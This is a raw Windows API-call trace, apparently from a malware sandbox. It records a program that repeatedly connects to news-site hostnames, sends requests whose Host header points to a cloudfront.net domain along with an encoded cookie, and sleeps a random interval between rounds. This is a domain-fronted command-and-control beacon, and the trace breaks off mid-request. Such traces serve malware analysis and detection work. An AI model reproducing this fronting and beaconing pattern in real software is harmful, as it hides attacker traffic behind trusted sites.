[0100.188] GetLastError () returned 0x0
[0100.188] SetLastError (dwErrCode=0x0)
[0100.188] htonl (hostlong=0x0) returned 0x0
[0100.188] GetLastError () returned 0x0
[0100.188] SetLastError (dwErrCode=0x0)
[0100.188] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0100.188] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0100.188] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0100.188] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0101.225] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0101.225] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0101.225] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0101.225] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x19, wMilliseconds=0x21d))
[0101.225] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0101.225] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0101.225] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x19, wMilliseconds=0x21d))
[0101.225] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f08) returned 1
[0101.225] CryptGenRandom (in: hProv=0x383f08, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0101.225] CryptReleaseContext (hProv=0x383f08, dwFlags=0x0) returned 1
[0101.225] Sleep (dwMilliseconds=0x35b9)
[0111.241] GetLastError () returned 0x0
[0111.241] SetLastError (dwErrCode=0x0)
[0111.241] GetLastError () returned 0x0
[0111.248] SetLastError (dwErrCode=0x0)
[0111.248] GetLastError () returned 0x0
[0111.248] SetLastError (dwErrCode=0x0)
[0111.248] GetLastError () returned 0x0
[0111.248] SetLastError (dwErrCode=0x0)
[0111.248] GetLastError () returned 0x0
[0111.248] SetLastError (dwErrCode=0x0)
[0111.248] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0111.248] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0111.248] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0111.249] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0111.249] GetLastError () returned 0x0
[0111.249] SetLastError (dwErrCode=0x0)
[0111.249] htonl (hostlong=0xa000000) returned 0xa
[0111.249] htonl (hostlong=0x22000000) returned 0x22
[0111.249] GetLastError () returned 0x0
[0111.249] SetLastError (dwErrCode=0x0)
[0111.249] htonl (hostlong=0xa000000) returned 0xa
[0111.249] htonl (hostlong=0x47000000) returned 0x47
[0111.250] GetLastError () returned 0x0
[0111.250] SetLastError (dwErrCode=0x0)
[0111.250] htonl (hostlong=0xa000000) returned 0xa
[0111.250] htonl (hostlong=0x1f000000) returned 0x1f
[0111.250] GetLastError () returned 0x0
[0111.250] SetLastError (dwErrCode=0x0)
[0111.250] htonl (hostlong=0x7000000) returned 0x7
[0111.250] htonl (hostlong=0x0) returned 0x0
[0111.250] htonl (hostlong=0x8000000) returned 0x8
[0111.250] htonl (hostlong=0x2000000) returned 0x2
[0111.250] htonl (hostlong=0x8000000) returned 0x8
[0111.250] htonl (hostlong=0x6000000) returned 0x6
[0111.250] htonl (hostlong=0x6000000) returned 0x6
[0111.250] GetLastError () returned 0x0
[0111.251] SetLastError (dwErrCode=0x0)
[0111.251] htonl (hostlong=0x0) returned 0x0
[0111.251] GetLastError () returned 0x0
[0111.251] SetLastError (dwErrCode=0x0)
[0111.251] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0111.251] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0111.251] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0111.251] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0111.980] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0111.980] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0111.980] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0111.980] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x24, wMilliseconds=0x12c))
[0111.980] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0111.980] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0111.980] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x24, wMilliseconds=0x12c))
[0111.980] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3838a8) returned 1
[0111.981] CryptGenRandom (in: hProv=0x3838a8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0111.982] CryptReleaseContext (hProv=0x3838a8, dwFlags=0x0) returned 1
[0111.982] Sleep (dwMilliseconds=0x34f2)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0121.990] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0121.990] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0121.990] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] htonl (hostlong=0xa000000) returned 0xa
[0121.990] htonl (hostlong=0x22000000) returned 0x22
[0121.990] GetLastError () returned 0x0
[0121.990] SetLastError (dwErrCode=0x0)
[0121.990] htonl (hostlong=0xa000000) returned 0xa
[0121.991] htonl (hostlong=0x47000000) returned 0x47
[0121.991] GetLastError () returned 0x0
[0121.991] SetLastError (dwErrCode=0x0)
[0121.991] htonl (hostlong=0xa000000) returned 0xa
[0121.991] htonl (hostlong=0x1f000000) returned 0x1f
[0121.991] GetLastError () returned 0x0
[0121.991] SetLastError (dwErrCode=0x0)
[0121.991] htonl (hostlong=0x7000000) returned 0x7
[0121.991] htonl (hostlong=0x0) returned 0x0
[0121.991] htonl (hostlong=0x8000000) returned 0x8
[0121.991] htonl (hostlong=0x2000000) returned 0x2
[0121.991] htonl (hostlong=0x8000000) returned 0x8
[0121.991] htonl (hostlong=0x6000000) returned 0x6
[0121.991] htonl (hostlong=0x6000000) returned 0x6
[0121.991] GetLastError () returned 0x0
[0121.991] SetLastError (dwErrCode=0x0)
[0121.991] htonl (hostlong=0x0) returned 0x0
[0121.991] GetLastError () returned 0x0
[0121.991] SetLastError (dwErrCode=0x0)
[0121.991] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0121.991] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0121.991] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0121.991] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0122.709] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0122.709] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0122.709] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0122.709] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x2f, wMilliseconds=0x18))
[0122.709] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0122.709] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0122.709] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x2f, wMilliseconds=0x18))
[0122.709] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0122.709] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0122.709] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0122.709] Sleep (dwMilliseconds=0x3690)
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0132.755] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0132.755] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0132.755] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] htonl (hostlong=0xa000000) returned 0xa
[0132.755] htonl (hostlong=0x22000000) returned 0x22
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] htonl (hostlong=0xa000000) returned 0xa
[0132.755] htonl (hostlong=0x47000000) returned 0x47
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] htonl (hostlong=0xa000000) returned 0xa
[0132.755] htonl (hostlong=0x1f000000) returned 0x1f
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] htonl (hostlong=0x7000000) returned 0x7
[0132.755] htonl (hostlong=0x0) returned 0x0
[0132.755] htonl (hostlong=0x8000000) returned 0x8
[0132.755] htonl (hostlong=0x2000000) returned 0x2
[0132.755] htonl (hostlong=0x8000000) returned 0x8
[0132.755] htonl (hostlong=0x6000000) returned 0x6
[0132.755] htonl (hostlong=0x6000000) returned 0x6
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.755] htonl (hostlong=0x0) returned 0x0
[0132.755] GetLastError () returned 0x0
[0132.755] SetLastError (dwErrCode=0x0)
[0132.756] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0132.756] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0132.756] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0132.756] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0133.470] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0133.470] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0133.470] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0133.471] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x39, wMilliseconds=0x30f))
[0133.471] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0133.471] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0133.471] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x39, wMilliseconds=0x30f))
[0133.471] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0133.471] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0133.471] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0133.471] Sleep (dwMilliseconds=0x3942)
[0143.482] GetLastError () returned 0x0
[0143.482] SetLastError (dwErrCode=0x0)
[0143.482] GetLastError () returned 0x0
[0143.482] SetLastError (dwErrCode=0x0)
[0143.482] GetLastError () returned 0x0
[0143.482] SetLastError (dwErrCode=0x0)
[0143.482] GetLastError () returned 0x0
[0143.482] SetLastError (dwErrCode=0x0)
[0143.482] GetLastError () returned 0x0
[0143.482] SetLastError (dwErrCode=0x0)
[0143.482] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0143.482] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0143.482] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0143.482] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] htonl (hostlong=0xa000000) returned 0xa
[0143.483] htonl (hostlong=0x22000000) returned 0x22
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] htonl (hostlong=0xa000000) returned 0xa
[0143.483] htonl (hostlong=0x47000000) returned 0x47
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] htonl (hostlong=0xa000000) returned 0xa
[0143.483] htonl (hostlong=0x1f000000) returned 0x1f
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] htonl (hostlong=0x7000000) returned 0x7
[0143.483] htonl (hostlong=0x0) returned 0x0
[0143.483] htonl (hostlong=0x8000000) returned 0x8
[0143.483] htonl (hostlong=0x2000000) returned 0x2
[0143.483] htonl (hostlong=0x8000000) returned 0x8
[0143.483] htonl (hostlong=0x6000000) returned 0x6
[0143.483] htonl (hostlong=0x6000000) returned 0x6
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] htonl (hostlong=0x0) returned 0x0
[0143.483] GetLastError () returned 0x0
[0143.483] SetLastError (dwErrCode=0x0)
[0143.483] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0143.483] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0143.483] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0143.483] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0144.149] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0144.149] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0144.149] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0144.149] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x8, wMilliseconds=0x1ce))
[0144.149] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0144.149] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0144.149] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x8, wMilliseconds=0x1ce))
[0144.149] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0144.149] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0144.149] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0144.149] Sleep (dwMilliseconds=0x2ffb)
[0154.157] GetLastError () returned 0x0
[0154.157] SetLastError (dwErrCode=0x0)
[0154.157] GetLastError () returned 0x0
[0154.157] SetLastError (dwErrCode=0x0)
[0154.157] GetLastError () returned 0x0
[0154.157] SetLastError (dwErrCode=0x0)
[0154.157] GetLastError () returned 0x0
[0154.157] SetLastError (dwErrCode=0x0)
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0154.158] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0154.158] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0154.158] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] htonl (hostlong=0xa000000) returned 0xa
[0154.158] htonl (hostlong=0x22000000) returned 0x22
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] htonl (hostlong=0xa000000) returned 0xa
[0154.158] htonl (hostlong=0x47000000) returned 0x47
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] htonl (hostlong=0xa000000) returned 0xa
[0154.158] htonl (hostlong=0x1f000000) returned 0x1f
[0154.158] GetLastError () returned 0x0
[0154.158] SetLastError (dwErrCode=0x0)
[0154.158] htonl (hostlong=0x7000000) returned 0x7
[0154.158] htonl (hostlong=0x0) returned 0x0
[0154.158] htonl (hostlong=0x8000000) returned 0x8
[0154.158] htonl (hostlong=0x2000000) returned 0x2
[0154.158] htonl (hostlong=0x8000000) returned 0x8
[0154.158] htonl (hostlong=0x6000000) returned 0x6
[0154.158] htonl (hostlong=0x6000000) returned 0x6
[0154.158] GetLastError () returned 0x0
[0154.159] SetLastError (dwErrCode=0x0)
[0154.159] htonl (hostlong=0x0) returned 0x0
[0154.159] GetLastError () returned 0x0
[0154.159] SetLastError (dwErrCode=0x0)
[0154.159] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0154.159] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0154.159] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
